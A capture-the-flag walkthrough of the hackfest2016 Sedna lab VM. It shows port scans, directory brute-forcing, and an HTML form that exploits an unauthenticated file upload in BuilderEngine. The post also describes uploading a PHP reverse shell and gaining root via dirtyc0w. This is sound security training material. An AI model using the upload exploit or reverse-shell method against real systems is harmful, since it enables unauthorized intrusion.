walk-throughs

hackfest2016: Sedna Walk-through

fahad

Hi There,

In this post I will walk-through the hackfest2016: Sedna VM So Let’s start !

Enumeration:

We will scan all TCP ports along with top UDP ports

root@kali:~/vulnhub/sedna# nmap -sS -p- -A --reason 192.168.17.156  \
> && nmap -sU -sV -A --top-ports 100 192.168.17.156 \
> && nmap -sU -p 161 192.168.17.156 \
> && nmap -sU -p 69 192.168.17.156

Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-27 17:35 +03
Nmap scan report for 192.168.17.156
Host is up, received arp-response (0.0011s latency).
Not shown: 65523 closed ports
Reason: 65523 resets
PORT      STATE SERVICE     REASON         VERSION
22/tcp    open  ssh         syn-ack ttl 64 OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 aa:c3:9e:80:b4:81:15:dd:60:d5:08:ba:3f:e0:af:08 (DSA)
|   2048 41:7f:c2:5d:d5:3a:68:e4:c5:d9:cc:60:06:76:93:a5 (RSA)
|_  256 ef:2d:65:85:f8:3a:85:c2:33:0b:7d:f9:c8:92:22:03 (ECDSA)
53/tcp    open  domain      syn-ack ttl 64 ISC BIND 9.9.5-3-Ubuntu
| dns-nsid: 
|_  bind.version: 9.9.5-3-Ubuntu
80/tcp    open  http        syn-ack ttl 64 Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_Hackers
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
110/tcp   open  pop3        syn-ack ttl 64 Dovecot pop3d
|_pop3-capabilities: AUTH-RESP-CODE SASL STLS TOP CAPA UIDL PIPELINING RESP-CODES
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T19:17:14
|_Not valid after:  2026-10-07T19:17:14
|_ssl-date: TLS randomness does not represent time
111/tcp   open  rpcbind     syn-ack ttl 64 2-4 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          32833/tcp  status
|_  100024  1          55738/udp  status
139/tcp   open  netbios-ssn syn-ack ttl 64 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp   open  imap        syn-ack ttl 64 Dovecot imapd (Ubuntu)
|_imap-capabilities: more IDLE LOGIN-REFERRALS post-login STARTTLS Pre-login LITERAL+ IMAP4rev1 LOGINDISABLEDA0001 capabilities listed have OK ID SASL-IR ENABLE
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T19:17:14
|_Not valid after:  2026-10-07T19:17:14
|_ssl-date: ERROR: Script execution failed (use -d to debug)
445/tcp   open  netbios-ssn syn-ack ttl 64 Samba smbd 4.1.6-Ubuntu (workgroup: WORKGROUP)
993/tcp   open  ssl/imap    syn-ack ttl 64 Dovecot imapd (Ubuntu)
|_imap-capabilities: IDLE LOGIN-REFERRALS post-login more AUTH=PLAINA0001 LITERAL+ IMAP4rev1 capabilities Pre-login listed have OK ID SASL-IR ENABLE
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T19:17:14
|_Not valid after:  2026-10-07T19:17:14
|_ssl-date: ERROR: Script execution failed (use -d to debug)
995/tcp   open  ssl/pop3    syn-ack ttl 64 Dovecot pop3d
|_pop3-capabilities: AUTH-RESP-CODE USER SASL(PLAIN) TOP CAPA UIDL PIPELINING RESP-CODES
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T19:17:14
|_Not valid after:  2026-10-07T19:17:14
|_ssl-date: TLS randomness does not represent time
8080/tcp  open  http        syn-ack ttl 64 Apache Tomcat/Coyote JSP engine 1.1
| http-methods: 
|_  Potentially risky methods: PUT DELETE
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat
32833/tcp open  status      syn-ack ttl 64 1 (RPC #100024)
MAC Address: 00:0C:29:E7:55:B6 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.6
Network Distance: 1 hop
Service Info: Host: SEDNA; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -32s, deviation: 0s, median: -32s
|_nbstat: NetBIOS name: SEDNA, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Unix (Samba 4.1.6-Ubuntu)
|   NetBIOS computer name: SEDNA\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2017-04-27T10:35:56-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol

TRACEROUTE
HOP RTT     ADDRESS
1   1.08 ms 192.168.17.156

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 144.96 seconds

Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-27 17:38 +03
Nmap scan report for 192.168.17.156
Host is up (0.00091s latency).
Not shown: 49 closed ports, 47 open|filtered ports
PORT     STATE SERVICE    VERSION
53/udp   open  domain     ISC BIND 9.9.5-3-Ubuntu
| dns-nsid: 
|_  bind.version: 9.9.5-3-Ubuntu
|_dns-recursion: Recursion appears to be enabled
111/udp  open  rpcbind    2-4 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          32833/tcp  status
|_  100024  1          55738/udp  status
137/udp  open  netbios-ns Samba nmbd netbios-ns (workgroup: WORKGROUP)
5353/udp open  mdns       DNS-based service discovery
| dns-service-discovery: 
|   9/tcp workstation
|_    Address=192.168.17.156 fe80:0:0:0:20c:29ff:fee7:55b6
MAC Address: 00:0C:29:E7:55:B6 (VMware)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop
Service Info: Host: SEDNA

Host script results:
|_nbstat: NetBIOS name: SEDNA, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)

TRACEROUTE
HOP RTT     ADDRESS
1   0.91 ms 192.168.17.156

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 268.13 seconds

Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-27 17:42 +03
Nmap scan report for 192.168.17.156
Host is up (0.00092s latency).
PORT    STATE  SERVICE
161/udp closed snmp
MAC Address: 00:0C:29:E7:55:B6 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 5.09 seconds

Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-27 17:42 +03
Nmap scan report for 192.168.17.156
Host is up (0.0012s latency).
PORT   STATE  SERVICE
69/udp closed tftp
MAC Address: 00:0C:29:E7:55:B6 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.40 seconds

There is 2 web application on port 80 and 8080, I did try to hack the tomcat server at port 8080 by abusing the PUT HTTP method However turns out the Nmap scan result is false. Also I could not log in to manager panel on tomcat by defaults credentials or common password.

Now let’s try hacking the web application on port 80, there is nothing interesting just HTML page with planet photo. in this case I will brute force directories.

gobuster -w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,302,307,403,500' -e -u http://192.168.17.156

Gobuster v1.2                OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://192.168.17.156/
[+] Threads      : 10
[+] Wordlist     : /usr/share/seclists/Discovery/Web_Content/common.txt
[+] Status codes : 302,307,403,500,200,204,301
[+] Expanded     : true
=====================================================
http://192.168.17.156/.htaccess (Status: 403)
http://192.168.17.156/.hta (Status: 403)
http://192.168.17.156/.htpasswd (Status: 403)
http://192.168.17.156/blocks (Status: 301)
http://192.168.17.156/files (Status: 301)
http://192.168.17.156/index.html (Status: 200)
http://192.168.17.156/modules (Status: 301)
http://192.168.17.156/robots.txt (Status: 200)
http://192.168.17.156/server-status (Status: 403)
http://192.168.17.156/system (Status: 301)
http://192.168.17.156/themes (Status: 301)
=====================================================

themes directory seems interesting.

After browsing the directories, We can tell the application BuilderEngine is used.

So I did search for submitted exploit on exploit-db.com and found this one

Exploitation:

basically this exploit will make a POST request to the web application and upload any arbitrary file, I edited the exploit to point to the VM IP address then try to upload the famous php-reverse-shell after editing my listening IP and port.

root@kali:~/vulnhub/sedna# cat > upload.html
<html>
<body>
<form method="post" action="http://192.168.17.156/themes/dashboard/assets/plugins/jquery-file-upload/server/php/" enctype="multipart/form-data">
    <input type="file" name="files[]" />
    <input type="submit" value="send" />
</form>
</body>
</html>
^C

Then get the following response from t he application.

Now all we have to do is reach the file in the files directory as mentioned in the exploit. Setting NC listener to get the reverse shell.

http://192.168.17.156/files/php-reverse-shell.php

after looking around a bit we got the first flag:

Privilege Escalation:

I always try kernel exploits at first but this time could not get a root shell after trying many. I did try the dirtyc0w kernel exploit since the victim system fit and luckily this works.

Leave a Reply